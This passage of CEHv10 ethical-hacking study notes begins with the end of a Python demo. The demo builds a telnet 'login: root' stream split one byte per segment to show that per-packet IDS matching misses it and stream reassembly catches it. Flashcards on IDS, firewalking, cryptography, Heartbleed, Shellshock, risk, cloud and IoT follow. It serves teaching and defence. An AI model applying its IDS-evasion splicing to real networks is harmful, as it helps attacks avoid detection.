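        stream = b"".join(s.payload for s in sorted(segs, key=lambda s: s.seq))
        if header_matches(rule, dst, dport) and rule["content"] in stream:
            hits.append((src, sport, dst, dport))
    return hits


LOGIN = b"login: root\r\n"
# Constructed traffic: one client sends the login in a single segment; a second client
# splices it one byte per segment (what Whisker does) and the segments arrive out of order.
NORMAL = [Segment("192.168.5.7", 51000, "10.0.0.9", 23, 1000, LOGIN)]
SPLICED = [Segment("192.168.5.8", 51001, "10.0.0.9", 23, 2000 + i, bytes([b]))
           for i, b in enumerate(LOGIN)]
SPLICED.reverse()

if __name__ == "__main__":
    traffic = NORMAL + SPLICED
    print("per-packet hits:", detect_per_packet(RULE, traffic))
    print("reassembled hits:", detect_with_reassembly(RULE, traffic))
```

The per-packet engine sees "r", "o", "o", "t" in separate packets and never matches; after reassembly both flows trigger. The same gap exists for fragmented IP packets, which is why real IDS engines carry both a TCP stream and an IP defragmentation preprocessor.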
Intrusion Detection System
Identifies malicious activities
False Negative
No alarm is triggered when one should be triggered
Cryptcat
Allows for encrypted passing of data over the network
Network based intrusion detection
system (NIDS)
Monitors all network traffic
ideal for observing sensitive network segments
Firewalking
Determines which ports are open and whether packets can pass through the packet filter
and the firewall, using traceroute-style probes whose TTL expires one hop beyond the firewall
Receipt of an ICMP “Time-to-live exceeded” message from that hop indicates the port was not blocked at the firewall
False positive
Alarm is triggered when one should not be triggered
CEHv10 Module 17 Cloud
Computing
Cloud Computing
Cloud computing is the on-demand delivery of IT capabilities, where IT infrastructure
and applications are provided to subscribers as metered services over a network.
Characteristics of Cloud Computing
1. On-demand self service.
2. Distributed storage.
3. Rapid elasticity.
4. Automated management.
5. Broad network access.
6. Resource pooling.
7. Measured service.
8. Virtualization technology.
CEHv10 Module 18 Cryptography
RSA
Uses product of two large prime numbers
PKI
Designed to verify and authenticate the identity of individuals
XOR
1 XOR 1=0
1 XOR 0=1
0 XOR 1=1
0 XOR 0=0
Heartbleed
Serious buffer over-read in OpenSSL's TLS heartbeat extension (CVE-2014-0160)
Leaks up to 64 KB of server process memory per request, which can include the server's private key, session cookies and passwords
Collision attack
Two inputs producing the same hash
Public Key (Asymmetric)
PGP
SSL
IKE
RSA
Hash
Ensures integrity of data
TLS
Successor to SSL
Disk Encryption
Best protection against data compromise in the event of physical theft of the device.
SSL
asymmetric key pair is used to deliver the shared session key
Private Key (Symmetric)
Faster than Asymmetric
AES
DES
RC4
Digital signature
Hash of the document encrypted with the private key of the signer; the verifier decrypts it with the public key and compares it against a fresh hash of the document
Certificate Authority (CA)
Vouches for the identity of an individual or company
CEHv10 Module 19 Ethics,
Process, General Knowledge
Risk equation
Risks = Threats x Vulnerabilities
Backup tapes
Most secure retention method is an offsite location
Host command
host -t a targetdomain.org
Risk
Can never be fully eliminated, but can be reduced to acceptable levels
Physical security
Should be considered in a risk assessment
Shellshock
GNU bash shell vulnerability often exploited through a malformed environment variable
Five basic responses to risk
accept
avoid
mitigate
share
transfer
Vulnerability scanner
May be used to audit compliance with security policies
Time synchronization
Ensures log file event correlation is accurate
Threat
An entity or event with the potential to adversely impact a system
Residual risk
Risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed
compmgmt.msc
Launches Computer
Management Console
If you encounter evidence of a
crime:
Immediately stop and contact law enforcement
Sandbox
A restricted OS for testing code
Application Layer
Responsible for moving and processing data between tiers
If you discover a vulnerability
Notify the web site owner
Single sign-on
Permits users to authenticate once and gain access to multiple systems
Biometric processing speed
The time it takes to be accepted or rejected from when an individual provides
identification and authentication information
Civil liability
Executives are liable for not reasonably protecting company's assets in information
systems
Digital signature
Must be authentic and incapable of being forged
deny tcp any any
permit tcp any any
All TCP traffic would be blocked: rules are evaluated top-down, the first matching rule applies and the rest are disregarded
Stateful firewall
Tracks the state of connections and passes only packets that belong to an established session (a stateless packet filter judges each packet on its own)
PCI compliance
Use a firewall between the public network and the payment card data
Limit access to card holder data to as few individuals as possible
Use encryption to protect all transmission of card holder data over any public network
C++
Most susceptible to buffer overflows (with C), since the language performs no bounds checking on arrays and raw pointers
Monitoring Employees
Employees must be informed that they are being monitored
Likelihood
The probability that a threat-source will exploit a vulnerability
To verify that a backup can
be restored
Perform a full restore
CEHv10 Module 20
Performing a Penetration
Test
Defining Security
Assessments
A penetration tester assesses the security posture of the organization as a whole
to reveal the potential consequences of a real attacker compromising a network or
application. Security assessments can be categorized as security audits,
vulnerability assessments, or penetration testing.
Penetration Testing Steps
Penetration testing includes three phases:
● Preattack phase
● Attack phase
● Postattack phase
CEHv10 Module 21 IoT
Security
IoT Security
IoT Security is key for the secure development and secure operation of scalable IoT
applications and services that connect the real and virtual worlds between objects,
systems, and people.
IoT Introduces an Increased
Number of Security Threats
One of the big differences between the Internet of Things and previous internet
technology is that the number of possible threats is much larger.
IoT Security Happens on Four
Different Layers
IoT solution architectures require multi-layered security approaches that seamlessly work
together to provide complete end-to-end security from device to cloud and everything in
between throughout the lifecycle of the solution.
Increasing Automation of IoT
Security Tasks
With forecasted growth to billions of IoT devices, manually handling security tasks (e.g.,
revoking certificates, isolating compromised devices), as is still the case in many solutions
today, will not be feasible.
END
